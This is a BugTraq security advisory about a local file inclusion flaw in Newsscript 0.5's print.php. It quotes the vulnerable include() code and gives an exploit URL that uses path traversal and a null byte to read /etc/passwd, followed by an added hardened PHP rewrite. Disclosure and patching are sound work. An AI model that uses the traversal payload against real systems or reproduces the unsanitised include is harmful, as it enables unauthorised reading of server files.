BugTraq
Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability
Sep 12 2006 03:06AM
daftrix gmail com
# Subject:
--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability"
# Vulnerable version:
--- "Newsscript version 0.5"
# Vendor URL:
--- Email - mail (at) webmaster-journal (dot) com
--- Website - http://webmaster-journal.com
# Available in:
--- http://www.comscripts.com/scripts/php.wm-news.203.html
# Vulnerability:
--- Vulnerable code in print/print.php
--- $ide var is not sanitized and can be used to include files from local resources
--- 1 <html>
--- 2 <head>
--- 3 <?
--- 4 $file_name = "../".$ide.".txt";
--- 5 ?>
---
---
--- 27 include($file_name);
# Exploit:
--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00
# Discovered By:
--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com
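
A hardened form of the lookup in print/print.php, as an added example that is not part of the original advisory and not Newsscript code. It assumes article ids are short alphanumeric names, that articles are plain-text .txt files one directory above print/, and uses a hypothetical helper name resolve_article().

```php
<?php
// Added example, not Newsscript code. Assumptions: article ids are short
// alphanumeric names; articles are plain-text .txt files one level above print/.

/**
 * Resolve an article id to a file inside $baseDir, or return null.
 * resolve_article() is a hypothetical helper name.
 */
function resolve_article($ide, $baseDir)
{
    // 1. Allowlist: rejects "/", "..", NUL bytes (the %00 that drops the
    //    ".txt" suffix on PHP versions that truncate paths at a NUL) and
    //    array-valued parameters such as ?ide[]=x.
    if (!is_string($ide) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $ide)) {
        return null;
    }

    // 2. Canonicalise both paths; realpath() returns false for missing files.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $ide . '.txt');
    if ($base === false || $path === false) {
        return null;
    }

    // 3. Containment: the resolved file must sit directly in the base
    //    directory, which also catches symlinks that point elsewhere.
    if (dirname($path) !== $base || !is_file($path)) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly instead of relying on register_globals.
$ide  = isset($_GET['ide']) ? $_GET['ide'] : '';
$path = resolve_article($ide, __DIR__ . '/..');

if ($path === null) {
    header('HTTP/1.1 404 Not Found');
    exit('Article not found');
}

// Article text is data, not code: print it escaped instead of include()-ing it.
echo nl2br(htmlspecialchars(file_get_contents($path), ENT_QUOTES));
```

If the article files are meant to carry HTML markup, replace the last line with readfile($path); the point is that the file is never passed to include().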
Copyright 2010, SecurityFocus